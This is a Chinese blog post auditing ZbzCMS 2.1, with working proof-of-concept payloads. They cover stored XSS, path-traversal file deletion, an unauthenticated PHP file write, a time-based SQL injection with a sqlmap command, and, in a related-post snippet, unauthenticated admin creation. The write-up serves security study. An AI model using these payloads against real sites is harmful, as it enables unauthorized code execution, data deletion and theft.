ZbzCMS 2.1代码审计

最新推荐文章于 2024-07-17 14:52:39 发布
最新推荐文章于 2024-07-17 14:52:39 发布
阅读量327 收藏 3
点赞数 5
文章标签: android okhttp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/137880190
版权

  • ZbzCMS 2.1代码审计

    • 漏洞复现

    • 漏洞复现

    • 漏洞复现

    • 漏洞复现

    • 存储型XSS

    • 前台任意文件删除

    • 前台未授权RCE

    • 前台Mysql盲注

ZbzCMS 2.1代码审计

源码下载: https://pan.baidu.com/s/1DOFYZKdTAlpPiZ-MwEVXFw

存储型XSS

定位到一处存储XSS:
/cms/common/php/ajax.php

图片

漏洞复现

/cms/common/php/ajax.php?run=liuyan处抓包
构建payload:

 

  1.  
    POST传入:
     
  2.  
    diaoyongbiaoqian=hacker&neirong=<script>alert("what the hack")</script>&leixing=1.1.1.1
     
 

图片
 


 后台查看XSS是否生效
 

图片
 

前台任意文件删除
 

定位到一处可能存在文件删除的漏洞
/cms/cms/include/up.php
 

图片
 

在删除文件的操作中没有进行权限的识别
 

图片
 

漏洞复现
 

测试删除hellword.txt文件
 

图片
 


/cms/cms/include/up.php?run=del处抓包
 构造payload:
 

 

  1.  
    POST传入
     
  2.  
    url=../../../helloword.txt
     
 

图片
 


 放包后可以看到helloword.txt已经被删除
 

图片
 

前台未授权RCE
 

/cms/cms/admin/run_ajax.php 第461-470行
 存在文件编辑保存操作
 

图片
 

漏洞复现
 

传入Path neirong参数即可构成任意文件读写/创建操作
 Payload:(在根目录写入一个hello.php文件):
 

 

  1.  
    POST /cms/cms/admin/run_ajax.php?run=wenjian_edit HTTP/1.1
     
  2.  
     
  3.  
    path=../../../hello.php&neirong=<?php phpinfo();?>
     
 

/cms/cms/admin/run_ajax.php?run=wenjian_edit处抓包
 

图片
 


 放包后可以看到生成了hello.php文件
 

图片
 


 访问hello.php成功
 

图片
 

前台Mysql盲注
 

对代码进行复审,发现 /cms/common/php/ajax.php 存在SQL注入
 

图片
 

漏洞复现
 

payload:
 (这里是直接使用了sqlmap的payload)
 

 

run=ad&id=3 AND (SELECT 3437 FROM (SELECT(SLEEP(5)))QQHn)
 

图片
 

使用sqlmap
 

python sqlmap.py -u "http://x.x.x.x//cms/common/php/ajax.php?run=ad&id=3" -p id
 

  
 

图片
 

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权
 

免费领取安全学习资料包!
 


 渗透工具
 

技术文档、书籍
 

 

面试题
 

 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 

应急响应笔记
 

 

学习路线
 

 


                

        

        

    




    

      

        

            

              
                
                  黑客大佬
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    5
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    3
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
最新Laysns仿ZB响应式CMS轻主题 可做资源娱乐网

				
			

			

				

					html模板下载
				

				

					03-11
					
					303
					
				

			

		

		

			
				
介绍:
laysns用户的福利。
仅可用于laysns程序,手机端仿zblong版本模板!

网盘下载地址:
https://zijiewangpan.com/cuB1Xhk8cVp

图片:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DHVoC3yb-1615382973844)(https://www.5438.com.cn/static/pic/2/21_03_11/1615454918_29738.png)]

...

			
		

	



                

              
                



	

		

			

				
					
zbzcms代码审计

				
			

			

				

					yzl_007的博客
				

				

					05-27
					
					1058
					
				

			

		

		

			
				
zbzcms审计
自己的一个简单记录,可能写的有点混乱,欢迎师傅们指出。
环境搭建
http://127.0.0.1/zbzcms/cms/cms/install/index.php

直接可以自动安装好

正常前台界面

开始
初次学习,就跟着师傅的文章一步步来,正常第一步就seay扫一遍

1、任意文件删除


$run传入,并没有做删除的校验判断
右键全文跟踪

跟到

get传入,up.php 的路径就是:/cms/cms/include/up.php?run=del
get请求一下路径:

还是很

			
		

	



                


  
              

                


	

		

			

				
					
使用zbzcms.com进行代码审计

				
			

			

				

					qq_62673514的博客
				

				

					01-15
					
					274
					
				

			

		

		

			
				
使用zbzcms.com进行代码审计

			
		

	





	

		

			

				
					
php代码审计篇二——ZbzCMS

				
			

			

				

					2201_75353421的博客
				

				

					10-16
					
					205
					
				

			

		

		

			
				
有段时间没有更新了,这段时间一直在对一些项目重点保护,所以学习有些滞后,但是审代码一直是我比较感兴趣的事,这次也是选择用自己学到的方法结合网上一些已知的漏洞进行审计,希望我的文章也能给想做代审的小伙伴提供思路。

			
		

	



		

			
		



	

		

			

				
					
代码审计之文件上传漏洞实验

				
			

			

				

					A1956936030的博客
				

				

					12-08
					
					3424
					
				

			

		

		

			
				
一、phpstudy搭建zbzcms.com网站

二、使用seay源代码审计工具
1.进行自动审计,发现可疑文件上传的漏洞

2.双击打开,分析代码,添加变量输出$_FILES
添加代码如下:var_dump($_FILES);
3.在网站根目录下新建html文件内容如下
<html>
<head>
<meta charset="utf-8">
<title>xxx</title>
</head>
<body>

<

			
		

	





	

		

			

				
					
zbzcms代码审计实验2

				
			

			

				

					A1956936030的博客
				

				

					12-15
					
					2895
					
				

			

		

		

			
				
前台未授权添加管理员
一、用seay代码审计系统,自动审计代码,发现可疑代码

二、查看代码,并分析看看

发现可疑参数mima和guanliyuan,即密码和管理员,
构造URL
/cms/cms/admin/run_ajax.php?run=admin

构造payload
mima=haha123&guanliyuan=haha


三、使用hackbar插件执行payload
发现返回一个值为5

尝试用构造的管理员用户和密码登录看看

发现权限不足无法登录,这里有两种方

			
		

	





	

		

			

				
					
zblogCMS插件-支持各种zblog主题

				
			

			

				

					qq_787143156的博客
				

				

					01-19
					
					527
					
				

			

		

		

			
				
zblogCMS插件是指针对zblogCMS网站开发的插件,在已经熟悉了解的zblogCMS的情况下,今天博主就教大家借助免费zblogCMS插件快速提升网站收录以及关键词排名。0基础新手可以直接上手!





1、 网站优化原理

网站优化原理是反馈优质数据给百度等搜索平台,进而提升站点排名,词数和流量,比如提升蜘蛛抓取量,提升网站外链数量,站点等级,优化蜘蛛抓取速度等,进而提升网站关键词排名,首页排名词数以及网站流量。

2、 SEO是什么?

SEO意思是搜索引擎优化,通过在搜索引擎上优化关键词,.

			
		

	





	

		

			

				
					
PHP代码审计 -- 文件上传

				
			

			

				

					qq_46635165的博客
				

				

					12-15
					
					978
					
				

			

		

		

			
				
工具&环境
工具:Seay源代码审计系统,文本编辑器一个
环境:phpstudy,网站源码是 zbzcms

步骤
1, 将zbzcms网站源码放入phpstudy,根据网站安装引导完成网站搭建;
2,打开Seay,新建项目 --> 选择网站源码 --> 自动审计,审计完成后点击 漏洞描述对审计结果进行排序,方便结果查看:
3,审计完成,关注存在文件上传这一类,对结果进行观察,一般存在文件上传的地方存在upload,include,up等关键词,然后再看,发现也有文件上传在admin目录

			
		

	





	

		

			

				
					
十大免费cms建站系统介绍

				
			

			

				

					07-31
				

			

		

		

			
				
十大免费CMS 建站系统介绍(PHP+MYSQL) 
这里为需要建站但又徘徊的朋友介绍10 个免费PHP+MySql 平台下的CMS 内容管理系统, 
可能会对你的选择有指导作用。 

1. Joomla! 

一套在国外相当知名的内容管理系统,2007 年开源cms 第一名!Joomla!是使用PHP 
语言加上MySQL 数据库所开发的软件系统,可以在 Linux、Windows、MacOSX 等各种不 
同的平台上执行。操作接口除了美观之外,也花了很多心力在设计这些接口的简易操作性。 
但初次使用者,需要花一点时间学习一下操作的方式,才能运用自如。。 

官方网站:www.joomla.org 

2. Drupal 

是一个强大的软件,它可以让个人或社区使用者很容易地发表、管理并组织一个网站里大量 
且多样的内容。已经有许多个人和组织采用Drupal 来建立各种不同的网站。Drupal 是一套 
采用GPL 授权的开放源码软件,是由数以千计的使用者和开发人员所共同维护和开发的

			
		

	





	

		

			

				
					
最新Laysns程序仿ZB响应式CMS轻主题模板

				
			

			

				

					php源码
				

				

					03-20
					
					257
					
				

			

		

		

			
				
介绍:
laysns用户的富丽。
刘贝资源网站长新作品。
仅可用于laysns程序,手机端仿zblong版本模板!

网盘下载地址:
https://zijiewangpan.com/tQ3QVqAkdjl

图片:





			
		

	





	

		

			

				
					
cms代码审计练习

				
			

			

				

					黑面狐
				

				

					04-18
					
					1534
					
				

			

		

		

			
				
1、letter-post 存在xss漏洞打开写信文件modul/letter/post.phppost 提交进来的数据都经过p8_stripslashes2函数处理跟踪p8_stripslashes2函数lang/inc/init.php可以判断magic_qutes 开启时直接使用p8_stripslashes函数,不开启时直接返回输入的字符继续追踪p8_stripslashes函数删掉反斜杠...

			
		

	





	

		

			

				
					
展开说说:Android之View基础知识解析

				
			

			

				

					Hidanchaofan的博客
				

				

					07-13
					
					906
					
				

			

		

		

			
				
View虽不属于Android四代组件,但应用程度却非常非常广泛。在Android客户端,君所见之处皆是View。我们看到的Button、ImageView、TextView等等可视化的控件都是View,ViewGroup是View的子类因此它也是View。但是现在我们把View和ViewGroup当成两个类来看待,ViewGroup可以容纳View和ViewGroup,但View不可以再容纳其他View或ViewGroup,这种容纳的关系可以一直延伸仿佛一棵大树,从内而外有了父子关系,因此有个概念叫做Vi

			
		

	





	

		

			

				
					
【16】Android基础知识之Window(二) - ViewRootImpl

				
			

			

				

					mr_zengkun的博客
				

				

					07-16
					
					586
					
				

			

		

		

			
				
ViewRootImpl、WMS、绘制、硬件加速

			
		

	





	

		

			

				
					
深入探索Laravel框架中的Blade模板引擎

				
			

			

				

					2402_85762143的博客
				

				

					07-14
					
					781
					
				

			

		

		

			
				
Blade是Laravel框架自带的模板引擎,它允许你使用纯PHP代码来编写HTML模板。Blade的语法非常简洁,它使用双大括号{{ }}来输出数据,使用三组大括号!!!来输出未转义的HTML内容,以及使用符号来定义控制结构,比如@foreach@if等。

			
		

	





	

		

			

				
					
uniapp打包成Android时,使用uni.chooseLocation在App端显示的地址列表是空白?一直转圈的解决办法

				
			

			

				

					南北极之间
				

				

					07-14
					
					457
					
				

			

		

		

			
				
之前一直用的是【使用公共测试证书】地图列表一直转圈,后来改成了【使用自有证书】这个选项,填入3个信息后,再继续下一步,打包后,就能正常显示地图列表了。

			
		

	





	

		

			

				
					
Android init.rc如何并行执行任务

					
最新发布

				
			

			

				

					netwalk的专栏
				

				

					07-17
					
					917
					
				

			

		

		

			
				
Android 系统中,init.rc 是一个重要的启动脚本,用于定义系统启动时需要执行的服务、操作和初始化任务,也是用来配置系统启动时的各种服务、属性和动作的脚本文件。虽然 init.rc 文件本身是一个序列化的配置文件,init.rc 文件中的命令通常按顺序执行,但 Android 的 init 进程和 init.rc 文件中的机制允许一定程度的并行执行任务,通过特定的机制,Android 也支持并行执行 init.rc 中的命令。

			
		

	





	

		

			

				
					
android inflate 参数含义

				
			

			

				

					阿饱同学
				

				

					07-12
					
					424
					
				

			

		

		

			
				
Android开发中,inflate方法用于将 XML 布局文件转换为相应的 View 对象。在调用inflate: 布局资源文件的ID。通常是通过这种形式指定的。: 要附加到的父 ViewGroup。如果传入 null,则不附加到任何父 ViewGroup。这个参数决定了生成的 View 的 LayoutParams。: 是否将生成的 View 直接附加到 root 上。如果为 true,则生成的 View 会被立即添加到 root 中。

			
		

	





	

		

			

				
					
Android12 禁用adb

				
			

			

				

					Framework-coder的博客
				

				

					07-15
					
					197
					
				

			

		

		

			
				
这种做法没有删除任何adb相关的东西,只是设置中的adb相关属性时添加宏控制。

			
		

	





	

		

			

				
					
Android-- 集成谷歌地图

				
			

			

				

					wulong756273的博客
				

				

					07-14
					
					944
					
				

			

		

		

			
				
项目需求需要在谷歌地图:地图展示,设备点聚合,设备站点,绘制点和区域等功能。我只针对我涉及到的技术做一下总结,希望能帮到开始接触谷歌地图的伙伴们。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值